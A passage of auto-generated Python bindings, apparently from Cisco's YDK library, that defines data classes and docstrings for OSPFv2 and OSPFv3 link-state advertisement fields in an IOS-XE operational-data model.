((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. 
attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>` **config**\: False .. 
attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', 
(YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), 
['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. 
attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. 
attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None 